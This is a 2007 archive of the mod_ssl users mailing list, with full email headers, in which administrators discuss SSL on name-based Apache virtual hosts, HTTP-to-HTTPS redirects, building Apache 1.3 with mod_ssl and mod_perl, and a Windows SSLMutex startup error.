wrote: > > These are name based virtual hosts. Numerous hosts, only one IP > > address. So each of the included .conf files below such as devl00.conf > > and devl01.conf begin with something like this: > > > > > > > > ServerName devl02.mydomain.net > > ServerAdmin webmaster@mydomain.net > > LogLevel debug > > > > > > So I can access https://devl02.mydomain.com/ directly, but if I try and > > redirect from http://devl02.mydomain.com to the https URL of the same > > name, I get the default insecure web site, which is defined in the > > httpd.conf file. > > > > -Thanks > > > > > > > > Cliff Woolley wrote: > >> Are these IP-based virtual hosts or name-based virtual hosts? See > >> http://httpd.apache.org/docs/2.0/vhosts/name-based.html > >> > >> --Cliff > >> > >> > >> On 10/15/07, *Bernard Barton* >> > wrote: > >> > >> In my main httpd.conf file, I have numerous include files which > >> include > >> virtual hosts like so: > >> > >> Include /usr/local/apache/conf/conf.d/devl00.conf > >> Include /usr/local/apache/conf/conf.d/devl01.conf > >> Include /usr/local/apache/conf/conf.d/devl02.conf > >> > >> > >> So if I access http://devl02.mydomain.com/ then I see the virtual host > >> defined > >> in devl02.conf, etc. In the devl02.conf file, I have enabled > >> SSL. I CAN > >> access the secure site https://devl02.mydomain.com/. However, > >> when I now > >> access the non-secure site of http://devl02.mydomain.com, the main > >> server > >> web site is displayed, and not the virtual host. What I'm trying > >> to do > >> is a > >> > >> RedirectPermanent / https://cj-devl02.mydomain.net/ > >> > >> But when I do this I get errors that I posted previously about > >> cookies not > >> being enabled. So I guess the questions is, having the "Include" > >> statements > >> above, and knowing that each include file like devl08.conf is a > >> virtual host > >> container with SSL enabled, how do I redirect from the port 80 > >> version to > >> the SSL enabled port 443 version like: > >> > >> http://cj-devl02.mydomain.net/ ------> https://cj-devl02.mydomain.net/ > >> > >> FYI, I've tried including .conf files, and also pasting the > >> contents of my > >> .conf files into an email, but they evidently are rejected by the > >> mailing list. > >> > >> ______________________________________________________________________ > >> Apache Interface to OpenSSL (mod_ssl) > >> www.modssl.org > >> User Support Mailing List > >> modssl-users@modssl.org > >> Automated List > >> Manager majordomo@modssl.org > >> > >> > >> > > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > > -- > Andrew Hougie > Grinton > 5 Aldenham Grove > Radlett > Herts WD7 7BW ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Oct 16 15:14:45 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 603EF14D9E6; Tue, 16 Oct 2007 15:14:45 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from rwcrmhc12.comcast.net (rwcrmhc12.comcast.net [216.148.227.152]) by master.modssl.org (Postfix) with ESMTP id B116314D84C for ; Tue, 16 Oct 2007 15:14:44 +0200 (CEST) Received: from rmailcenter16.comcast.net ([204.127.197.126]) by comcast.net (rwcrmhc12) with SMTP id <20071016131440m1200covque>; Tue, 16 Oct 2007 13:14:40 +0000 Received: from [66.241.32.158] by rmailcenter16.comcast.net; Tue, 16 Oct 2007 13:14:40 +0000 From: bfb21@comcast.net To: modssl-users@modssl.org Subject: Will these name based virtual host work with SSL? Date: Tue, 16 Oct 2007 13:14:40 +0000 Message-Id: <101620071314.11291.4714B9400005C7FB00002C1B2205886442CECD0D000D@comcast.net> X-Mailer: AT&T Message Center Version 1 (Oct 4 2006) X-Authenticated-Sender: YmZiMjFAY29tY2FzdC5uZXQ= Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: bfb21@comcast.net X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users If in my httpd.conf file I have numerous virtual hosts defined with include files like: Include /usr/local/apache/conf/conf.d/devl00.conf Include /usr/local/apache/conf/conf.d/devl01.conf Include /usr/local/apache/conf/conf.d/devl02.conf Include /usr/local/apache/conf/conf.d/devl03.conf If I SSL enable the entire server in the main httpd.conf file, would I be able to access each virtual host on port 443 like https://devl02.mydomain.com/? I believe I would be able to access https://www.mydomain.com securely as well. I guess the question is, can you SSL enable the entire server, and access each virtual host via port 443? -Thanks ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Oct 16 15:21:35 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 9274214D9E6; Tue, 16 Oct 2007 15:21:35 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from rune.pobox.com (rune.pobox.com [208.210.124.79]) by master.modssl.org (Postfix) with ESMTP id 44ED314D84C for ; Tue, 16 Oct 2007 15:21:34 +0200 (CEST) Received: from rune (localhost [127.0.0.1]) by rune.pobox.com (Postfix) with ESMTP id C02BB149B36 for ; Tue, 16 Oct 2007 09:21:52 -0400 (EDT) Received: from iXanax2.local (unknown [64.65.208.78]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by rune.sasl.smtp.pobox.com (Postfix) with ESMTP id 7D56E149B31 for ; Tue, 16 Oct 2007 09:21:51 -0400 (EDT) Message-ID: <4714BAD0.9040102@w3works.com> Date: Tue, 16 Oct 2007 09:21:20 -0400 From: Dave Paris User-Agent: Thunderbird 2.0.0.6 (Macintosh/20070728) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Will these name based virtual host work with SSL? References: <101620071314.11291.4714B9400005C7FB00002C1B2205886442CECD0D000D@comcast.net> In-Reply-To: <101620071314.11291.4714B9400005C7FB00002C1B2205886442CECD0D000D@comcast.net> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Dave Paris X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users a) no. b) each virtual host would need a separate address - you cannot use SSL with name-based virtual hosts. Best~ -d bfb21@comcast.net wrote: > If in my httpd.conf file I have numerous virtual hosts defined with include files like: > > Include /usr/local/apache/conf/conf.d/devl00.conf > Include /usr/local/apache/conf/conf.d/devl01.conf > Include /usr/local/apache/conf/conf.d/devl02.conf > Include /usr/local/apache/conf/conf.d/devl03.conf > > > If I SSL enable the entire server in the main httpd.conf file, would I be able to access each virtual host on port 443 like https://devl02.mydomain.com/? > I believe I would be able to access https://www.mydomain.com securely as well. > I guess the question is, can you SSL enable the entire server, and access each virtual host via port 443? > > > -Thanks > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Oct 16 16:08:52 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 2C7F814D9E6; Tue, 16 Oct 2007 16:08:52 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from defout.telus.net (outbound05.telus.net [199.185.220.224]) by master.modssl.org (Postfix) with ESMTP id 5EED714D84C for ; Tue, 16 Oct 2007 16:08:50 +0200 (CEST) Received: from priv-edtnaa05.telusplanet.net ([137.186.246.196]) by priv-edtnes90.telusplanet.net (InterMail vM.7.08.02.00 201-2186-121-20061213) with ESMTP id <20071016140847.KJOQ10241.priv-edtnes90.telusplanet.net@priv-edtnaa05.telusplanet.net>; Tue, 16 Oct 2007 08:08:47 -0600 Received: from [192.168.2.100] (d137-186-246-196.abhsia.telus.net [137.186.246.196]) by priv-edtnaa05.telusplanet.net (BorderWare MXtreme Infinity Mail Firewall) with ESMTP id 40WP1MV0QW; Tue, 16 Oct 2007 08:08:46 -0600 (MDT) Message-ID: <4714C610.8030201@daltons.ca> Date: Tue, 16 Oct 2007 08:09:20 -0600 From: Aaron Dalton User-Agent: Thunderbird 2.0.0.6 (Windows/20070728) MIME-Version: 1.0 To: modssl-users@modssl.org, bfb21@comcast.net Subject: Re: Will these name based virtual host work with SSL? References: <101620071314.11291.4714B9400005C7FB00002C1B2205886442CECD0D000D@comcast.net> In-Reply-To: <101620071314.11291.4714B9400005C7FB00002C1B2205886442CECD0D000D@comcast.net> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Aaron Dalton X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users bfb21@comcast.net wrote: > If in my httpd.conf file I have numerous virtual hosts defined with include files like: > > Include /usr/local/apache/conf/conf.d/devl00.conf > Include /usr/local/apache/conf/conf.d/devl01.conf > Include /usr/local/apache/conf/conf.d/devl02.conf > Include /usr/local/apache/conf/conf.d/devl03.conf > > > If I SSL enable the entire server in the main httpd.conf file, would I be able to access each virtual host on port 443 like https://devl02.mydomain.com/? > I believe I would be able to access https://www.mydomain.com securely as well. > I guess the question is, can you SSL enable the entire server, and access each virtual host via port 443? > This comes up so often that it is in the Apache SSL FAQ. You may not have more than one SSL host on any given IP/Port combination. http://httpd.apache.org/docs/2.2/ssl/ssl_faq.html#vhosts http://httpd.apache.org/docs/2.2/ssl/ssl_faq.html#vhosts2 -- Aaron Dalton | Super Duper Games aaron@daltons.ca | http://superdupergames.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Oct 16 16:15:02 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 1D4B314D9E6; Tue, 16 Oct 2007 16:15:02 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from rune.pobox.com (rune.pobox.com [208.210.124.79]) by master.modssl.org (Postfix) with ESMTP id C7BCB14D84C for ; Tue, 16 Oct 2007 16:15:01 +0200 (CEST) Received: from rune (localhost [127.0.0.1]) by rune.pobox.com (Postfix) with ESMTP id 988C9149D5E for ; Tue, 16 Oct 2007 10:15:20 -0400 (EDT) Received: from iXanax2.local (unknown [64.65.208.78]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by rune.sasl.smtp.pobox.com (Postfix) with ESMTP id 45909149D5C for ; Tue, 16 Oct 2007 10:15:19 -0400 (EDT) Message-ID: <4714C75F.7000501@w3works.com> Date: Tue, 16 Oct 2007 10:14:55 -0400 From: Dave Paris User-Agent: Thunderbird 2.0.0.6 (Macintosh/20070728) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Will these name based virtual host work with SSL? References: <101620071314.11291.4714B9400005C7FB00002C1B2205886442CECD0D000D@comcast.net> <4714C610.8030201@daltons.ca> In-Reply-To: <4714C610.8030201@daltons.ca> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Dave Paris X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users ok, with my notes and Aaron's, there *is* something you can do. If you create the certificate for www.domain.com, you can rewrite HTTPS requests to something like: https://www.domain.com/dev100/ https://www.domain.com/dev101/ ::tosses 0.02$USD on the table:: -d Aaron Dalton wrote: > bfb21@comcast.net wrote: >> If in my httpd.conf file I have numerous virtual hosts defined with include files like: >> >> Include /usr/local/apache/conf/conf.d/devl00.conf >> Include /usr/local/apache/conf/conf.d/devl01.conf >> Include /usr/local/apache/conf/conf.d/devl02.conf >> Include /usr/local/apache/conf/conf.d/devl03.conf >> >> >> If I SSL enable the entire server in the main httpd.conf file, would I be able to access each virtual host on port 443 like https://devl02.mydomain.com/? >> I believe I would be able to access https://www.mydomain.com securely as well. >> I guess the question is, can you SSL enable the entire server, and access each virtual host via port 443? >> > > This comes up so often that it is in the Apache SSL FAQ. You may not > have more than one SSL host on any given IP/Port combination. > > http://httpd.apache.org/docs/2.2/ssl/ssl_faq.html#vhosts > > http://httpd.apache.org/docs/2.2/ssl/ssl_faq.html#vhosts2 > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Oct 16 22:00:51 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 507D514D9E7; Tue, 16 Oct 2007 22:00:51 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from rwcrmhc14.comcast.net (rwcrmhc14.comcast.net [216.148.227.154]) by master.modssl.org (Postfix) with ESMTP id 9220E14D84C for ; Tue, 16 Oct 2007 22:00:49 +0200 (CEST) Received: from rmailcenter05.comcast.net ([204.127.197.115]) by comcast.net (rwcrmhc14) with SMTP id <20071016200046m1400p7f3ee>; Tue, 16 Oct 2007 20:00:46 +0000 Received: from [66.241.32.158] by rmailcenter05.comcast.net; Tue, 16 Oct 2007 20:00:45 +0000 From: bfb21@comcast.net To: modssl-users@modssl.org Subject: Re: Will these name based virtual host work with SSL? Date: Tue, 16 Oct 2007 20:00:45 +0000 Message-Id: <101620072000.6386.4715186D000D3193000018F22200735834CECD0D000D@comcast.net> X-Mailer: AT&T Message Center Version 1 (Oct 4 2006) X-Authenticated-Sender: YmZiMjFAY29tY2FzdC5uZXQ= Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: bfb21@comcast.net X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Thanks for the info. From what I gather I will not be able to access the virtual hosts via SSL since they are name based, unless I use the mod_gnutl apache module. Now my question is, if I purchase only 1 SSL certificate, and I SSL enable the main server like: https://www.mydomain.com/ Then of cousre, none of the virtual hosts like http://devl01.mydomain.com or http://devl01.mydomain.com would be accessible via SSL. Would this scneria work with just the main server SSL enabled and all the virtual hosts accessed via port 80? -Thanks -------------- Original message ---------------------- From: Aaron Dalton > bfb21@comcast.net wrote: > > If in my httpd.conf file I have numerous virtual hosts defined with include > files like: > > > > Include /usr/local/apache/conf/conf.d/devl00.conf > > Include /usr/local/apache/conf/conf.d/devl01.conf > > Include /usr/local/apache/conf/conf.d/devl02.conf > > Include /usr/local/apache/conf/conf.d/devl03.conf > > > > > > If I SSL enable the entire server in the main httpd.conf file, would I be able > to access each virtual host on port 443 like https://devl02.mydomain.com/? > > I believe I would be able to access https://www.mydomain.com securely as well. > > I guess the question is, can you SSL enable the entire server, and access each > virtual host via port 443? > > > > This comes up so often that it is in the Apache SSL FAQ. You may not > have more than one SSL host on any given IP/Port combination. > > http://httpd.apache.org/docs/2.2/ssl/ssl_faq.html#vhosts > > http://httpd.apache.org/docs/2.2/ssl/ssl_faq.html#vhosts2 > > -- > Aaron Dalton | Super Duper Games > aaron@daltons.ca | http://superdupergames.org > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Oct 16 22:32:36 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 0852414D9E6; Tue, 16 Oct 2007 22:32:36 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from sceptre.pobox.com (sceptre.pobox.com [207.106.133.20]) by master.modssl.org (Postfix) with ESMTP id 768AD14D84C for ; Tue, 16 Oct 2007 22:32:34 +0200 (CEST) Received: from sceptre (localhost.localdomain [127.0.0.1]) by sceptre.pobox.com (Postfix) with ESMTP id 814812EF for ; Tue, 16 Oct 2007 16:32:53 -0400 (EDT) Received: from iXanax2.local (unknown [64.65.208.78]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by sceptre.sasl.smtp.pobox.com (Postfix) with ESMTP id 52D0A89E65 for ; Tue, 16 Oct 2007 16:32:53 -0400 (EDT) Message-ID: <47151FD9.6070507@w3works.com> Date: Tue, 16 Oct 2007 16:32:25 -0400 From: Dave Paris User-Agent: Thunderbird 2.0.0.6 (Macintosh/20070728) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Will these name based virtual host work with SSL? References: <101620072000.6386.4715186D000D3193000018F22200735834CECD0D000D@comcast.net> In-Reply-To: <101620072000.6386.4715186D000D3193000018F22200735834CECD0D000D@comcast.net> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Dave Paris X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users re-read my previous mail on rewriting the URL. You *might* want to do something further, like: http://dev101.domain.com/secure/ gets rewritten to: https://www.domain.com/dev101/ mod_rewrite is your friend. ok, so it's more like a thug that clubs you over the head before patting you on the back and handing you a beer - but it's still your friend. -d bfb21@comcast.net wrote: > Thanks for the info. From what I gather I will not be able to access the virtual hosts via SSL since they are name based, unless I use the mod_gnutl apache module. Now my question is, if I purchase only 1 SSL certificate, and I SSL enable the main server like: > > https://www.mydomain.com/ > > Then of cousre, none of the virtual hosts like http://devl01.mydomain.com or > http://devl01.mydomain.com would be accessible via SSL. Would this scneria work with just the main server SSL enabled and all the virtual hosts accessed via port 80? > > -Thanks > > > > > -------------- Original message ---------------------- > From: Aaron Dalton >> bfb21@comcast.net wrote: >>> If in my httpd.conf file I have numerous virtual hosts defined with include >> files like: >>> Include /usr/local/apache/conf/conf.d/devl00.conf >>> Include /usr/local/apache/conf/conf.d/devl01.conf >>> Include /usr/local/apache/conf/conf.d/devl02.conf >>> Include /usr/local/apache/conf/conf.d/devl03.conf >>> >>> >>> If I SSL enable the entire server in the main httpd.conf file, would I be able >> to access each virtual host on port 443 like https://devl02.mydomain.com/? >>> I believe I would be able to access https://www.mydomain.com securely as well. >>> I guess the question is, can you SSL enable the entire server, and access each >> virtual host via port 443? >> This comes up so often that it is in the Apache SSL FAQ. You may not >> have more than one SSL host on any given IP/Port combination. >> >> http://httpd.apache.org/docs/2.2/ssl/ssl_faq.html#vhosts >> >> http://httpd.apache.org/docs/2.2/ssl/ssl_faq.html#vhosts2 >> >> -- >> Aaron Dalton | Super Duper Games >> aaron@daltons.ca | http://superdupergames.org >> ______________________________________________________________________ >> Apache Interface to OpenSSL (mod_ssl) www.modssl.org >> User Support Mailing List modssl-users@modssl.org >> Automated List Manager majordomo@modssl.org > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Oct 17 20:19:05 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 4D25814DA38; Wed, 17 Oct 2007 20:19:05 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from rwcrmhc11.comcast.net (rwcrmhc11.comcast.net [216.148.227.151]) by master.modssl.org (Postfix) with ESMTP id 24D4C14D866 for ; Wed, 17 Oct 2007 20:19:03 +0200 (CEST) Received: from rmailcenter78.comcast.net ([204.127.197.178]) by comcast.net (rwcrmhc11) with SMTP id <20071017181853m11004khrhe>; Wed, 17 Oct 2007 18:18:58 +0000 Received: from [66.241.32.158] by rmailcenter78.comcast.net; Wed, 17 Oct 2007 18:18:53 +0000 From: bfb21@comcast.net To: modssl-users@modssl.org Subject: How to build apache/mod_ssl/mod_perl together? Date: Wed, 17 Oct 2007 18:18:53 +0000 Message-Id: <101720071818.18682.4716520D0007DC8E000048FA2200761394CECD0D000D@comcast.net> X-Mailer: AT&T Message Center Version 1 (Oct 4 2006) X-Authenticated-Sender: YmZiMjFAY29tY2FzdC5uZXQ= Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: bfb21@comcast.net X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users I can't seem to build an SSL enabled httpd binary from the sources and instructions listed below. I'm basically following the instructions from the mod_perl instructions for SSL in the file INSTALL.simple.mod_ssl. But this does not result in an SSL/mod_perl enabled httpd binary. Can someone tell me what I'm doing wrong below? -Thanks tar zxvf apache_1.3.33.tar.gz tar zxvf mod_ssl-2.8.24-1.3.33.tar.gz tar zxvf openssl-0.9.6b.tar.gz tar zxvf mod_perl-1.0-current.tar.gz cd openssl-0.9.8b ./config make cd .. cd mod_ssl-2.8.24-1.3.33 ./configure \ --with-apache=../apache_1.3.33 \ --with-ssl=../openssl-0.9.8b \ --enable-module=ssl \ --enable-module=so \ --prefix=/usr/local/apache-1.3.33 cd.. cd mod_perl-1.29 perl Makefile.PL \ EVERYTHING=1 \ APACHE_SRC=../apache_1.3.33/src \ APACHE_PREFIX=/usr/local/apache-1.3.33 \ SSL_BASE=../openssl-0.9.8b \ USE_APACI=1 \ PREP_HTTPD=1 \ DO_HTTPD=1 \ APACI_ARGS=--enable-module=ssl,--enable-module=so,--enable-module=rewrite make ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Oct 19 21:51:00 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id B50CC14DA34; Fri, 19 Oct 2007 21:51:00 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from rwcrmhc14.comcast.net (rwcrmhc14.comcast.net [204.127.192.84]) by master.modssl.org (Postfix) with ESMTP id 1CAE214D882 for ; Fri, 19 Oct 2007 21:50:59 +0200 (CEST) Received: from rmailcenter78.comcast.net ([204.127.197.178]) by comcast.net (rwcrmhc14) with SMTP id <20071019195055m14004mkore>; Fri, 19 Oct 2007 19:50:55 +0000 Received: from [66.241.32.158] by rmailcenter78.comcast.net; Fri, 19 Oct 2007 19:50:54 +0000 From: bfb21@comcast.net To: modssl-users@modssl.org Date: Fri, 19 Oct 2007 19:50:54 +0000 Message-Id: <101920071950.18136.47190A9E000B082B000046D82200761394CECD0D000D@comcast.net> X-Mailer: AT&T Message Center Version 1 (Oct 4 2006) X-Authenticated-Sender: YmZiMjFAY29tY2FzdC5uZXQ= Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: bfb21@comcast.net X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users When I run an apachectl configtest, I get the errors below regarding compiling apache with -DEAPI. Now mod_ssl has a configure option --with-eapi-only, and apache has an option "--disable-rule=EAPI=no". But no matter what combination of these options I use, I still get the errors. Any suggestions would be greatly appreciated. [Fri Oct 19 11:15:33 2007] [warn] Loaded DSO libexec/mod_vhost_alias.so uses plain Apache 1.3 API, this module might crash under EAPI! (please recompile it with -DEAPI) [Fri Oct 19 11:15:33 2007] [warn] Loaded DSO libexec/mod_log_config.so uses plain Apache 1.3 API, this module might crash under EAPI! (please recompile it with -DEAPI) [Fri Oct 19 11:15:33 2007] [warn] Loaded DSO libexec/mod_actions.so uses plain Apache 1.3 API, this module might crash under EAPI! (please recompile it with -DEAPI) . . . ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Oct 19 23:56:52 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 5CC8C14DA3D; Fri, 19 Oct 2007 23:56:52 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from rwcrmhc14.comcast.net (rwcrmhc14.comcast.net [216.148.227.154]) by master.modssl.org (Postfix) with ESMTP id C4A1014D882 for ; Fri, 19 Oct 2007 23:56:50 +0200 (CEST) Received: from antares.bfbsystems.com (c-71-230-79-89.hsd1.pa.comcast.net[71.230.79.89]) by comcast.net (rwcrmhc14) with ESMTP id <20071019215646m14004lv7oe>; Fri, 19 Oct 2007 21:56:46 +0000 Message-ID: <4719281D.3090902@comcast.net> Date: Fri, 19 Oct 2007 17:56:45 -0400 From: Bernard Barton User-Agent: Thunderbird 2.0.0.5 (X11/20070727) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Plain API vs EAPI Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Bernard Barton X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users When I run an apachectl configtest, I get the errors below regarding compiling apache with -DEAPI. Now mod_ssl has a configure option --with-eapi-only, and apache has an option "--disable-rule=EAPI=no". But no matter what combination of these options I use, I still get the errors. Does mod_ssl have an option to turn off eapi? Any suggestions would be greatly appreciated. [Fri Oct 19 11:15:33 2007] [warn] Loaded DSO libexec/mod_vhost_alias.so uses plain Apache 1.3 API, this module might crash under EAPI! (please recompile it with -DEAPI) [Fri Oct 19 11:15:33 2007] [warn] Loaded DSO libexec/mod_log_config.so uses plain Apache 1.3 API, this module might crash under EAPI! (please recompile it with -DEAPI) [Fri Oct 19 11:15:33 2007] [warn] Loaded DSO libexec/mod_actions.so uses plain Apache 1.3 API, this module might crash under EAPI! (please recompile it with -DEAPI) -Thanks ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Oct 24 16:18:17 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 964C514D9ED; Wed, 24 Oct 2007 16:18:17 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from web35612.mail.mud.yahoo.com (web35612.mail.mud.yahoo.com [66.163.179.151]) by master.modssl.org (Postfix) with SMTP id AC1ED14D839 for ; Wed, 24 Oct 2007 16:18:16 +0200 (CEST) Received: (qmail 17932 invoked by uid 60001); 24 Oct 2007 14:18:12 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=X-YMail-OSG:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID; b=3gOIv1t6c3B2a9JPobV0J7PQxm2FRHUoryLzoUKfM0cST9NEidwxS4V1uNk2t5+B7mS0jjh7R2JzDllCHy8Vaf/3i1irvSsxSpRm9S6NFABBSL1pGF28KVngs0neMdI7+qv/9Zyqviyz+JYhcwb7gJq/+6nK0SZRAIIX0C3zAos=; X-YMail-OSG: Xh.eexsVM1mUzGzM2g54XmQo7W1LEqfRkGPmozIpwqwxeESZy_3rc7aJp6twfgq29bAjH9dYxvucN_2M.jU1JM.yPC2d4OYTA0ySaBPG4rh4v.2mCZU- Received: from [193.77.158.206] by web35612.mail.mud.yahoo.com via HTTP; Wed, 24 Oct 2007 07:18:11 PDT Date: Wed, 24 Oct 2007 07:18:11 -0700 (PDT) From: Jelka Kosir Subject: Apache2.2 with ssl on windows 2000 - service cannot start To: modssl-users@modssl.org MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Message-ID: <877472.16975.qm@web35612.mail.mud.yahoo.com> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Jelka Kosir X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users My goal was to to set up Subversion on Apache. I installed svn and apache 2.2 on Windows 2000 (a vmware image) system, I used the compiled binaries (I did not compile myself). File name was apache_2.2.6-win32-x86-openssl-0.9.8e.msi All works fine for the svn part through http, but I wanted also to setup ssl (after svn was already set up). I created server.key and server.crt files as described here: http://www.akadia.com/services/ssh_test_certificate.html and copied them to the Apache conf directory. I uncommented in httpd.conf the LoadModule ssl_module modules/mod_ssl.so I uncommented the Include conf/extra/httpd-ssl.conf I restarted my Apache Service but error is prompted: windows could not start apache2.2 service. Contact the service vendor and refer to service specific error code 1. if i run httpd.exe from commind line this echos: C:\Program Files\Apache Software Foundation\Apache2.2\bin>httpd.exe Syntax error on line 68 of C:/Program Files/Apache Software Foundation/Apache2.2 /conf/extra/httpd-ssl.conf: Invalid SSLMutex argument file:C:/Program Files/Apache Software Foundation/Apach e2.2/logs/ssl_mutex (Valid SSLMutex mechanisms are: `none', `default' ) and if I change in https-ssl.conf SSLMutex from SSLMutex "file:C:/Program Files/Apache Software Foundation/Apache2.2/logs/ssl_mutex" to SSLMutex none still the same error Where could my problem be ? Jelka __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Oct 27 00:34:53 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 